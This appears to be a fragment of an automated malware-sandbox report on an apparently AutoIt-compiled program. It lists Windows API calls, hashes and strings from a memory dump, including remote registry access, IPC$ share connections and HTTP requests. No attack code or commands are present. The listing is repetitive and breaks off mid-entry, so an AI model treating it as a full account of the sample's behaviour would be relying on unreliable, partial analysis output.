                                                                                                                                                                                                              • API String ID: 3566783562-438819550
                                                                                                                                                                                                              • Opcode ID: 6596cc74dd44ad280627fcc31af4148575c19bcf17ba6352dc42cdd6ab8135a2
                                                                                                                                                                                                              • Instruction ID: cdf82aa9d9812e4cfd120b583f9810c599fb9e7166e13d4217943c5a7bb787c8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6596cc74dd44ad280627fcc31af4148575c19bcf17ba6352dc42cdd6ab8135a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80616A725146059FCB10EF60C844A9FB3E8FF89310F04896EF999D7251EB35EA45CB92
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C3A2C2
                                                                                                                                                                                                                • Part of subcall function 00BE1A36: _memmove.LIBCMT ref: 00BE1A77
                                                                                                                                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C3A2E3
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C3A33C
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C3A355
                                                                                                                                                                                                              • _wprintf.LIBCMT ref: 00C3A3FC
                                                                                                                                                                                                              • _wprintf.LIBCMT ref: 00C3A41A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                              • API String ID: 311963372-3080491070
                                                                                                                                                                                                              • Opcode ID: c19dd56b55a4aaa6b3df2d620c9aa1cb1f27ad1237349850ea30e57a05800b05
                                                                                                                                                                                                              • Instruction ID: b1d3f1d6f4554b707a519b98b46674b4f86fdc12a3bb533d2809608a5277e38e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c19dd56b55a4aaa6b3df2d620c9aa1cb1f27ad1237349850ea30e57a05800b05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1951E171900149AACF14EBE5CD46EEEB7B9EF04340F2005A5F515B20A2EB352F68DB61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00C1F8B8,00000001,0000138C,00000001,00000000,00000001,?,00C43FF9,00000000), ref: 00C3009A
                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00C1F8B8,00000001), ref: 00C300A3
                                                                                                                                                                                                                • Part of subcall function 00BE1A36: _memmove.LIBCMT ref: 00BE1A77
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00C97310,?,00000FFF,?,?,00C1F8B8,00000001,0000138C,00000001,00000000,00000001,?,00C43FF9,00000000,00000001), ref: 00C300C5
                                                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00C1F8B8,00000001), ref: 00C300C8
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C30118
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C30129
                                                                                                                                                                                                              • _wprintf.LIBCMT ref: 00C301D2
                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00C301E9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                              • API String ID: 984253442-2268648507
                                                                                                                                                                                                              • Opcode ID: df079af16b2ad0984ced0eb53d239b39ce7b90feca3807659e1f1cfa6f5e0c14
                                                                                                                                                                                                              • Instruction ID: f38347ee25061b02df26f4ec9cb030141a114698fafe992b866c24e1be086fa3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df079af16b2ad0984ced0eb53d239b39ce7b90feca3807659e1f1cfa6f5e0c14
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7416D72800159AACF14FBE5CD96EEEB3BDAF14341F2005A5F501B2092DB356F59CB61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C5C0C8
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C5982C,?,?,00000000,?), ref: 00C5C0DF
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C5982C,?,?,00000000,?), ref: 00C5C0EA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C5C0F7
                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 00C5C100
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C5C10F
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00C5982C,?,?,00000000,?), ref: 00C5C118
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C5C11F
                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C5C130
                                                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C63C7C,?), ref: 00C5C149
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00C5C159
                                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00C5C17D
                                                                                                                                                                                                              • CopyImage.USER32 ref: 00C5C1A8
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00C5C1D0
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C5C1E6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3840717409-0
                                                                                                                                                                                                              • Opcode ID: 5519d0f02af9d14e71dcf19977c70035e7415f10008924a61f58faaa464ed781
                                                                                                                                                                                                              • Instruction ID: 162d22623561e5c527039a41cffa6bd5ca7b89d359b8af1f41ab2ee1d5d89fb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5519d0f02af9d14e71dcf19977c70035e7415f10008924a61f58faaa464ed781
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB411B75540204AFDB219F66DC88FAF7BB8EF89712F204058FD15E72A0DBB09945DB60
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BD29F3
                                                                                                                                                                                                              • PostMessageW.USER32 ref: 00C5C8A4
                                                                                                                                                                                                              • GetFocus.USER32 ref: 00C5C8B4
                                                                                                                                                                                                              • GetDlgCtrlID.USER32 ref: 00C5C8BF
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00C5C9EA
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00C5CA15
                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00C5CA35
                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00C5CA48
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00C5CA7C
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00C5CAC4
                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C5CAFC
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C5CB31
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 1296962147-4108050209
                                                                                                                                                                                                              • Opcode ID: 6c825de24174c5b2a261e0fb053a5cd8bbde35060829d36381df61cc4412d569
                                                                                                                                                                                                              • Instruction ID: 3c35488a928d67fc10edea6e98a7244172eb01a5f39211c9b82cf7bd45dfde80
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c825de24174c5b2a261e0fb053a5cd8bbde35060829d36381df61cc4412d569
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E81A0741083059FDB20CF15C885A6BBBE8FF88751F10451EFDA5A3291C770D989DBA6
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C3A4D4
                                                                                                                                                                                                                • Part of subcall function 00BE1A36: _memmove.LIBCMT ref: 00BE1A77
                                                                                                                                                                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 00C3A4F6
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C3A54F
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00C3A568
                                                                                                                                                                                                              • _wprintf.LIBCMT ref: 00C3A61E
                                                                                                                                                                                                              • _wprintf.LIBCMT ref: 00C3A63C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                              • API String ID: 311963372-2391861430
                                                                                                                                                                                                              • Opcode ID: b1444c6b9f7489f76ed915f84e04f190e21793a883c32f9d3559fae139e8b124
                                                                                                                                                                                                              • Instruction ID: ce7cfb3bc3460e0561f04e6240ec7dc8bd273e77ddc3b15f30012564cd0fdaba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1444c6b9f7489f76ed915f84e04f190e21793a883c32f9d3559fae139e8b124
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C51E271810149ABCF14EBE5CD46EEEB7B9EF04340F2046A5F515B21A2EB316F68CB61
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE1821: _memmove.LIBCMT ref: 00BE185B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00C28489
                                                                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C284BE
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C284DA
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C284F6
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C28520
                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 00C28548
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C28553
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C28558
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                              • API String ID: 1411258926-22481851
                                                                                                                                                                                                              • Opcode ID: d34d55ea93cad38e0cb32ed755ff1ce23c0286488284477a0ee2b3133133c034
                                                                                                                                                                                                              • Instruction ID: cbb8f1cdd8e4ecc1e860fbfa42c5eac2921a6659f50f12ca1f66864832c7cd04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d34d55ea93cad38e0cb32ed755ff1ce23c0286488284477a0ee2b3133133c034
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6411A72C1022DABDF21EBA9DC55EEEB7B8FF04340F104569E915A31A1DB709E05CB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD1F1D: InvalidateRect.USER32(?,00000000,00000001), ref: 00BD1F76
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00BD24AF
                                                                                                                                                                                                              • KillTimer.USER32 ref: 00BD254A
                                                                                                                                                                                                              • DestroyAcceleratorTable.USER32 ref: 00C0BFE7
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BD1AA7,00000000,?,?,00BD1EBE,?,?), ref: 00C0C018
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BD1AA7,00000000,?,?,00BD1EBE,?,?), ref: 00C0C02F
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BD1AA7,00000000,?,?,00BD1EBE,?,?), ref: 00C0C04B
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00C0C05D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 641708696-0
                                                                                                                                                                                                              • Opcode ID: 129dcf55e5640000a98ff611bc96aa90e13c693655b061fdd9ee9517f791c537
                                                                                                                                                                                                              • Instruction ID: 41326086f9b12beb9af1f567c47a3b26825815a689da6262d39d961dad41f239
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 129dcf55e5640000a98ff611bc96aa90e13c693655b061fdd9ee9517f791c537
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9761ED30115640DFCB359F14D98CB2AB7F1FF2031AF108A9AE95267BA0C371A980DF90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BD29BC
                                                                                                                                                                                                              • GetSysColor.USER32 ref: 00BD25AF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                                                              • Opcode ID: ef7fec17152d29060bfa4870eb76168fab600fb7084f6ed19b99b5817a4a7370
                                                                                                                                                                                                              • Instruction ID: 1f2f785d1cc673df74627970c7b70f030a61333e69f589c70e938b3ec70a77c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef7fec17152d29060bfa4870eb76168fab600fb7084f6ed19b99b5817a4a7370
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4841D630004280AFDB255F289C88BBD77A5EB26335F1443A2FD669A2E1E770CD41DB21
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSysColor.USER32 ref: 00BD260D
                                                                                                                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00BD2617
                                                                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00BD262C
                                                                                                                                                                                                              • GetStockObject.GDI32(00000005), ref: 00BD2634
                                                                                                                                                                                                              • GetClientRect.USER32 ref: 00C0C0FC
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C0C113
                                                                                                                                                                                                              • GetWindowDC.USER32(?), ref: 00C0C11F
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00C0C12E
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00C0C140
                                                                                                                                                                                                              • GetSysColor.USER32 ref: 00C0C15E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3430376129-0
                                                                                                                                                                                                              • Opcode ID: 7204bb489c92e9279a6118c83c122381a507d77ffe8f95a3341b800f1c514ac3
                                                                                                                                                                                                              • Instruction ID: d6cf5bd31784d3c332d22a176a3142e0e83dcd36ec618ff8b5c771d22492aee7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7204bb489c92e9279a6118c83c122381a507d77ffe8f95a3341b800f1c514ac3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F511BE31104244FFDB311FA5EC48BEE7BB1EB19321F2002A5FA26A41E1CBB14A50EF10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BD29F3
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetCursorPos.USER32(?), ref: 00BD2727
                                                                                                                                                                                                                • Part of subcall function 00BD2714: ScreenToClient.USER32(00C977B0,?), ref: 00BD2744
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetAsyncKeyState.USER32 ref: 00BD2769
                                                                                                                                                                                                                • Part of subcall function 00BD2714: GetAsyncKeyState.USER32 ref: 00BD2777
                                                                                                                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C5C69C
                                                                                                                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 00C5C6A2
                                                                                                                                                                                                              • ReleaseCapture.USER32 ref: 00C5C6A8
                                                                                                                                                                                                              • SetWindowTextW.USER32 ref: 00C5C752
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C5C765
                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C5C847
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                              • API String ID: 1924731296-2107944366
                                                                                                                                                                                                              • Opcode ID: 586e82c3bc9f9be1ffd6b946081a2cf76d60bbd6f70800ef4a9a8f84786a6ca3
                                                                                                                                                                                                              • Instruction ID: 21f556be5702edbb41deb0f1f7b7a8c25e71f46d440b2a14f67828c43698fdf8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 586e82c3bc9f9be1ffd6b946081a2cf76d60bbd6f70800ef4a9a8f84786a6ca3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8518D74108304AFDB10EF14CC99F6E7BE5EB88311F104A2AF965972E2DB70A949CB56
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C4211C
                                                                                                                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C42148
                                                                                                                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C4218A
                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C4219F
                                                                                                                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C421AC
                                                                                                                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C421DC
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00C42223
                                                                                                                                                                                                                • Part of subcall function 00C42B4F: GetLastError.KERNEL32(?,?,00C41EE3,00000000,00000000,00000001), ref: 00C42B64
                                                                                                                                                                                                                • Part of subcall function 00C42B4F: SetEvent.KERNEL32(?,?,00C41EE3,00000000,00000000,00000001), ref: 00C42B79
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2603140658-3916222277
                                                                                                                                                                                                              • Opcode ID: 63c3a50e1add3f4dea479a9e6a5f49551307d290cf6d957122663d29090e6ca3
                                                                                                                                                                                                              • Instruction ID: 33114a63ee52889b03952cb1e827e6983b9ab6358bdf497bb7a1a4efc49ab3a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63c3a50e1add3f4dea479a9e6a5f49551307d290cf6d957122663d29090e6ca3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9418FB1501218BFEB229F51CC8AFBF7BACFF08354F504116FA15AA151D7B0AE449BA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00C2B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C2B54D
